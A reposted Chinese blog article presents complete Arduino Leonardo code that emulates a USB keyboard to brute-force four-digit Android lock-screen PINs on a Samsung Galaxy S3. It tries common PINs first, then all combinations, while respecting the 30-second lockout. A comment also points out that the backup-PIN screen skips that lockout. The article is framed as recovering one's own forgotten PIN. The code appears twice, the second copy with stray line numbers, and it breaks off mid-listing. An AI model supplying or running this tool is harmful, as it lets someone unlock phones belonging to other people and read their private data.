通过arduino暴力破解Android手机【转载】

转载自：http://www.alsrobot.cn/article-572.html 、https://www.zybuluo.com/plantpark/note/26852

使用过安卓手机的小伙伴们肯定会有些惨痛经历，经常会忘记手机解锁图形和PIN码，但如果通过Root等方式破解手机恐怕再也无法得到官方保修，这里就介绍一种方法安全的破解它！

使用过安卓手机的小伙伴们肯定会有些惨痛经历，经常会忘记手机解锁图形和PIN码，但如果通过Root等方式破解手机恐怕再也无法得到官方保修，这里就介绍一种方法安全的破解它！三星Galaxy S3手机在输错5次PIN码后，会要求等待30s然后重新输入，幸运的是，每次输错都会要求等待30s，这等待时间并不会更改，这就给了hack的机会。
因为Arduino Leonardo可以作为HID设备模拟键盘通过USB OTG连接到手机，在这里我就选用了Leonardo，文章末尾有详细的代码。为了减少破解时间，可以把自己常用的密码或者数字组合优先测试。

当然，三星Galaxy S3手机的PIN码只有四位，如果从0000一直尝试到9999大概只需要16个小时，如果你的手机碰巧是小米手机，PIN码又碰巧设了17位，那你就果断Root吧~~

代码如下：

/* 
Brute forcing Android 4 Digit PIN's 
To run the whole range it will take upwards of 16 hours because of 
the 30 second delay after 5 bad inputs 
Intrestingly, if the target phone has the pattern enabled 
and the backup PIN set, the backup PIN entry system doesn't force the 30 second delay after 
invalid attempts 
http://blog.infosecsee.com */ 
 
const int buttonPin = 2; // input pin for pushbutton 
int previousButtonState = HIGH; // for checking the state of a pushButton 
int counter = 0; // button push counter 
int check = 0; 
 
void setup() { 
 
 pinMode(buttonPin, INPUT); 
 
Keyboard.begin(); 
} 
 
void loop() { 
 
int buttonState = digitalRead(buttonPin); 
if ((buttonState != previousButtonState) && (buttonState == HIGH)) { 
Mouse.move(25, 50, 0); 
String three = "000"; 
String two = "00"; 
String one = "0"; 
 
while(counter < 10000){ 
 delay(1000); 
while (check < 1){ 
Keyboard.println("1234"); 
 delay(500); 
Keyboard.println("1111"); 
 delay(500); 
Keyboard.println("0000"); 
 delay(500); 
Keyboard.println("1212"); 
 delay(500); 
Keyboard.println("7777"); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
Keyboard.println("1004"); 
 delay(500); 
Keyboard.println("2000"); 
 delay(500); 
Keyboard.println("4444"); 
 delay(500); 
Keyboard.println("2222"); 
 delay(500); 
Keyboard.println("6969"); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
Mouse.move(25, 50, 0); 
Keyboard.println("9999"); 
 delay(500); 
Keyboard.println("3333"); 
 delay(500); 
Keyboard.println("5555"); 
 delay(500); 
Keyboard.println("6666"); 
 delay(500); 
Keyboard.println("1122"); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
Keyboard.println("1313"); 
 delay(500); 
Keyboard.println("8888"); 
 delay(500); 
Keyboard.println("4321"); 
 delay(500); 
Keyboard.println("2001"); 
 delay(500); 
Keyboard.println("1010"); 
 delay(500); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
 check++;} 
if (counter < 10 && check == 1) { 
 
Keyboard.println(three + counter); 
 delay(500); 
 counter++; 
Keyboard.println(three + counter); 
 delay(500); 
 counter++; 
Keyboard.println(three + counter); 
 delay(500); 
 counter++; 
Keyboard.println(three + counter); 
 delay(500); 
 counter++; 
Keyboard.println(three + counter); 
 delay(500); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
} 
else if (counter < 100){ 
Keyboard.println(two + counter); 
 delay(500); 
 counter++; 
Keyboard.println(two + counter); 
 delay(500); 
 counter++; 
Keyboard.println(two + counter); 
 delay(500); 
 counter++; 
Keyboard.println(two + counter); 
 delay(500); 
 counter++; 
Keyboard.println(two + counter); 
 delay(500); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
} 
else if (counter < 1000){ 
Keyboard.println(one + counter); 
 delay(500); 
 counter++; 
Keyboard.println(one + counter); 
 delay(500); 
 counter++; 
Keyboard.println(one + counter); 
 delay(500); 
 counter++; 
Keyboard.println(one + counter); 
 delay(500); 
 counter++; 
Keyboard.println(one + counter); 
 delay(500); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
} 
else { 
Keyboard.println(counter); 
 delay(500); 
 counter++; 
Keyboard.println(counter); 
 delay(500); 
 counter++; 
Keyboard.println(counter); 
 delay(500); 
 counter++; 
Keyboard.println(counter); 
 delay(500); 
 counter++; 
Keyboard.println(counter); 
 delay(500); 
Keyboard.println(""); 
Keyboard.println(""); 
 delay(30000); 
Mouse.move(25, 50, 0); 
}  
}  
} 
 previousButtonState = buttonState; 
}

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

Brute forcing Android 4 Digit PIN's

To run the whole range it will take upwards of 16 hours because of

the 30 second delay after 5 bad inputs

Intrestingly, if the target phone has the pattern enabled

and the backup PIN set, the backup PIN entry system doesn't force the 30 second delay after

invalid attempts

http://blog.infosecsee.com */

const int buttonPin = 2; // input pin for pushbutton

int previousButtonState = HIGH; // for checking the state of a pushButton

int counter = 0; // button push counter

int check = 0;

void setup() {

pinMode(buttonPin, INPUT);

Keyboard.begin();

}

void loop() {

int buttonState = digitalRead(buttonPin);

if ((buttonState != previousButtonState) && (buttonState == HIGH)) {

Mouse.move(25, 50, 0);

String three = "000";

String two = "00";

String one = "0";

while(counter < 10000){

delay(1000);

while (check < 1){

Keyboard.println("1234");

delay(500);

Keyboard.println("1111");

delay(500);

Keyboard.println("0000");

delay(500);

Keyboard.println("1212");

delay(500);

Keyboard.println("7777");

Keyboard.println("");

delay(30000);

Mouse.move(25, 50, 0);

Keyboard.println("1004");

delay(500);

Keyboard.println("2000");

delay(500);

Keyboard.println("4444");

delay(500);

Keyboard.println("2222");

delay(500);

Keyboard.println("6969");

Keyboard.println("");

delay(30000);

Mouse.move(25, 50, 0);

Keyboard.println("9999");

delay(500);

Keyboard.println("3333");

delay(500);

Keyboard.println("5555");

delay(500);

Keyboard.println("6666");

delay(500);

Keyboard.println("1122");

Keyboard.println("");

delay(30000);

Mouse.move(25, 50, 0);

Keyboard.println("1313");

delay(500);

Keyboard.println("8888");

delay(500);

Keyboard.println("4321");

delay(500);

Keyboard.println("2001");

delay(500);

Keyboard.println("1010");

delay(500);

Keyboard.println("");

delay(30000);

Mouse.move(25, 50, 0);

check++;}

if (counter < 10 && check == 1) {

Keyboard.println(three + counter);

delay(500);

counter++;

Keyboard.println(three + counter);

delay(500);

counter++;

Keyboard.println(three + counter);

delay(500);

counter++;

Keyboard.println(three + counter);

delay(500);

counter++;

Keyboard.println(three + counter);

delay(500);

Keyboard.println("");

delay(30000);

Mouse.move(25, 50, 0);

}

else if (counter < 100){

Keyboard.println(two + counter);

delay(500);

counter++;

Keyboard.println(two + counter);

delay(500);

counter++;

Keyboard.println(two + counter);

delay(500);

counter++;

Keyboard.println(two + counter);

delay(500);

counter++;

Keyboard.println(two + counter);

delay(500);

Keyboard.println("");

delay(30000);

Mouse.move(25, 50, 0);

}

else if (counter < 1000){